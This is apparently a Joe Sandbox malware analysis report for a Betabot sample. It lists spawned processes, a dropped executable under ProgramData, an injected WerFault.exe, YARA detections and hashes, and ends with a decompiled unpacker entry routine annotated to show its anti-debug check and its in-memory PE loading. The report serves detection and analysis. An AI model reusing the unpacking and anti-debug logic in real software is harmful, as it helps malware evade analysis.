                      File size:185856 bytes
                      MD5 hash:15FF7D8324231381BAD48A052F85DF04
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Target ID:2
                      Start time:12:46:03
                      Start date:05/12/2022
                      Path:C:\Windows\System32\conhost.exe
                      Wow64 process (32bit):false
                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Imagebase:0x7ff7fcd70000
                      File size:625664 bytes
                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:high

                      Target ID:3
                      Start time:12:46:05
                      Start date:05/12/2022
                      Path:C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe
                      Wow64 process (32bit):true
                      Commandline:C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe
                      Imagebase:0xcd0000
                      File size:141312 bytes
                      MD5 hash:0DE785A3D83482EE5B7E3E396A641BC7
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000003.00000002.305956078.0000000000B98000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low

                      Target ID:4
                      Start time:12:46:05
                      Start date:05/12/2022
                      Path:C:\Windows\SysWOW64\WerFault.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\WerFault.exe
                      Imagebase:0x180000
                      File size:434592 bytes
                      MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000003.316616817.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000003.346386030.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000003.340678634.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000003.321889200.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000003.392904452.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000003.414915674.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000003.387584046.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000003.408213818.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000003.334422756.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000003.436527162.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000003.365991761.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000003.312736811.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000000.304158494.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000003.375167210.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000000.303926607.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000003.357948198.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000003.352061245.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000003.398750308.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000003.381234590.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      Reputation:high

                      Target ID:5
                      Start time:12:46:07
                      Start date:05/12/2022
                      Path:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Imagebase:0x180000
                      File size:909312 bytes
                      MD5 hash:77276DDC82248473D033E2494C438A97
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000005.00000002.572526351.0000000003A88000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000005.00000000.311100250.0000000003A88000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000005.00000000.309309441.0000000003A60000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      Reputation:moderate

                      Target ID:6
                      Start time:12:46:10
                      Start date:05/12/2022
                      Path:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Imagebase:0x180000
                      File size:909312 bytes
                      MD5 hash:77276DDC82248473D033E2494C438A97
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000006.00000000.314654922.0000000003330000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000006.00000002.571461105.0000000003358000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000006.00000000.316211995.0000000003358000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      Reputation:moderate

                      Target ID:7
                      Start time:12:46:12
                      Start date:05/12/2022
                      Path:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Imagebase:0x180000
                      File size:909312 bytes
                      MD5 hash:77276DDC82248473D033E2494C438A97
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000007.00000002.574221556.0000000003B88000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000007.00000000.319722392.0000000003B60000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000007.00000000.321390577.0000000003B88000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      Reputation:moderate

                      Target ID:8
                      Start time:12:46:14
                      Start date:05/12/2022
                      Path:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Imagebase:0x180000
                      File size:909312 bytes
                      MD5 hash:77276DDC82248473D033E2494C438A97
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000008.00000000.435841188.00000000011D8000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000008.00000000.432511210.00000000011B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000008.00000002.569348461.00000000011D8000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                      Reputation:moderate

                      Target ID:9
                      Start time:12:46:15
                      Start date:05/12/2022
                      Path:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Imagebase:0x180000
                      File size:909312 bytes
                      MD5 hash:77276DDC82248473D033E2494C438A97
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000009.00000002.572338181.0000000003518000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000009.00000000.332881474.00000000034F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000009.00000000.333990965.0000000003518000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      Reputation:moderate

                      Target ID:10
                      Start time:12:46:15
                      Start date:05/12/2022
                      Path:C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe"
                      Imagebase:0xcd0000
                      File size:141312 bytes
                      MD5 hash:0DE785A3D83482EE5B7E3E396A641BC7
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000A.00000002.329064108.0000000001538000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                      Reputation:low

                      Target ID:11
                      Start time:12:46:20
                      Start date:05/12/2022
                      Path:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Imagebase:0x180000
                      File size:909312 bytes
                      MD5 hash:77276DDC82248473D033E2494C438A97
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000B.00000002.573518624.00000000037A8000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000B.00000000.337658379.0000000003780000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000B.00000000.339819447.00000000037A8000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      Reputation:moderate

                      Target ID:12
                      Start time:12:46:23
                      Start date:05/12/2022
                      Path:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Imagebase:0x180000
                      File size:909312 bytes
                      MD5 hash:77276DDC82248473D033E2494C438A97
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000C.00000002.573127445.0000000002B48000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000C.00000000.343998812.0000000002B20000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000C.00000000.346029099.0000000002B48000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                      Target ID:13
                      Start time:12:46:23
                      Start date:05/12/2022
                      Path:C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe"
                      Imagebase:0xcd0000
                      File size:141312 bytes
                      MD5 hash:0DE785A3D83482EE5B7E3E396A641BC7
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000D.00000002.343659679.00000000012D8000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security

                      Target ID:14
                      Start time:12:46:25
                      Start date:05/12/2022
                      Path:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Imagebase:0x180000
                      File size:909312 bytes
                      MD5 hash:77276DDC82248473D033E2494C438A97
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000E.00000000.349814520.0000000003490000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000E.00000002.574122408.00000000034B8000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000E.00000000.351556895.00000000034B8000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                      Target ID:15
                      Start time:12:46:28
                      Start date:05/12/2022
                      Path:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Imagebase:0x180000
                      File size:909312 bytes
                      MD5 hash:77276DDC82248473D033E2494C438A97
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000F.00000002.573251429.0000000003568000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000F.00000000.355904622.0000000003540000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 0000000F.00000000.357740409.0000000003568000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                      Target ID:16
                      Start time:12:46:31
                      Start date:05/12/2022
                      Path:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Imagebase:0x180000
                      File size:909312 bytes
                      MD5 hash:77276DDC82248473D033E2494C438A97
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000010.00000002.573558016.0000000003F98000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000010.00000000.364565540.0000000003F98000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000010.00000000.361667048.0000000003F70000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                      Target ID:17
                      Start time:12:46:35
                      Start date:05/12/2022
                      Path:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Imagebase:0x180000
                      File size:909312 bytes
                      MD5 hash:77276DDC82248473D033E2494C438A97
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000011.00000002.571024772.0000000001418000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000011.00000000.371629767.00000000013F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000011.00000000.373766478.0000000001418000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                      Target ID:18
                      Start time:12:46:39
                      Start date:05/12/2022
                      Path:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Imagebase:0x180000
                      File size:909312 bytes
                      MD5 hash:77276DDC82248473D033E2494C438A97
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000012.00000000.380564947.0000000001F18000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000012.00000000.377927046.0000000001EF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000012.00000002.573636410.0000000001F18000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                      Target ID:19
                      Start time:12:46:42
                      Start date:05/12/2022
                      Path:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Imagebase:0x180000
                      File size:909312 bytes
                      MD5 hash:77276DDC82248473D033E2494C438A97
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000013.00000000.384576114.00000000037F0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000013.00000002.573110629.0000000003818000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000013.00000000.386887819.0000000003818000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                      Target ID:20
                      Start time:12:46:45
                      Start date:05/12/2022
                      Path:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Imagebase:0x180000
                      File size:909312 bytes
                      MD5 hash:77276DDC82248473D033E2494C438A97
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000014.00000002.574455217.0000000003B08000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000014.00000000.392323666.0000000003B08000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000014.00000000.390278122.0000000003AE0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                      Target ID:21
                      Start time:12:46:47
                      Start date:05/12/2022
                      Path:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Imagebase:0x180000
                      File size:909312 bytes
                      MD5 hash:77276DDC82248473D033E2494C438A97
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000015.00000000.396214324.0000000001C30000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000015.00000000.397968179.0000000001C58000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000015.00000002.569168238.0000000001C58000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                      Target ID:22
                      Start time:12:46:50
                      Start date:05/12/2022
                      Path:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Imagebase:0x180000
                      File size:909312 bytes
                      MD5 hash:77276DDC82248473D033E2494C438A97
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000016.00000000.407634102.00000000014D8000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000016.00000000.403064355.00000000014B0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000016.00000002.570822035.00000000014D8000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                      Target ID:23
                      Start time:12:46:54
                      Start date:05/12/2022
                      Path:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exe
                      Imagebase:0x180000
                      File size:909312 bytes
                      MD5 hash:77276DDC82248473D033E2494C438A97
                      Has elevated privileges:false
                      Has administrator privileges:false
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000017.00000002.567453491.0000000001648000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000017.00000000.411551366.0000000001620000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Betabot, Description: Yara detected Betabot, Source: 00000017.00000000.413386214.0000000001648000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security


                        Execution Graph

                        Execution Coverage:28.7%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:32%
                        Total number of Nodes:25
                        Total number of Limit Nodes:7

                        Callgraph

                        Control-flow Graph

                        C-Code - Quality: 87%
                        			_entry_() {
                        				signed int _v8;
                        				intOrPtr _t6;
                        				void* _t7;
                        				void* _t8;
                        				void* _t12;
                        				void* _t14;
                        
                        				_t6 =  *[fs:0x30]; // PEB
                        				// Anti-debug gate: the unpacker only runs when PEB->BeingDebugged (byte at offset 2) is not set
                        				if(_t6 == 0 ||  *((char*)(_t6 + 2)) != 1) {
                        					_v8 = _v8 & 0x00000000;
                        					if(E00CD1024() != 0) { // _t7 is the esi value left by this call
                        						_t8 = E00CD1133(_t7,  &_v8); // executed; decodes the embedded PE into a new RWX buffer, size returned in _v8
                        						_t12 = _t8;
                        						_pop(_t14);
                        						if(_t8 != 0 && E00CD1098(_t12) != 0) {
                        							E00CD16E9(_t12, _t14, _v8); // executed; loads the decoded image
                        						}
                        					}
                        				}
                        				ExitProcess(0);
                        			}

                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.305081884.0000000000CD1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CD0000, based on PE: true
                        • Associated: 00000000.00000002.305067270.0000000000CD0000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000000.00000002.305094573.0000000000CD2000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000000.00000002.305102626.0000000000CF4000.00000040.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_cd0000_BbbEtaIxAU.jbxd
                        Similarity
                        • API ID: ExitProcess
                        • String ID:
                        • API String ID: 621844428-0
                        • Opcode ID: c3e06d59c97abaf6c9797fcf831f39c369c84f9ae9716bb26adfaf5fb18a79dc
                        • Instruction ID: 5f8bba4b7440b4e86074b839e56e57ec53d7d8ac9f025570f35be7370099dc21
                        • Opcode Fuzzy Hash: c3e06d59c97abaf6c9797fcf831f39c369c84f9ae9716bb26adfaf5fb18a79dc
                        • Instruction Fuzzy Hash: DAF03031514245BAFB14ABE58E85B6A76EC9F01391F0C4066FF04D2356DA61DE049268
                        Uniqueness

                        Uniqueness Score: -1.00%

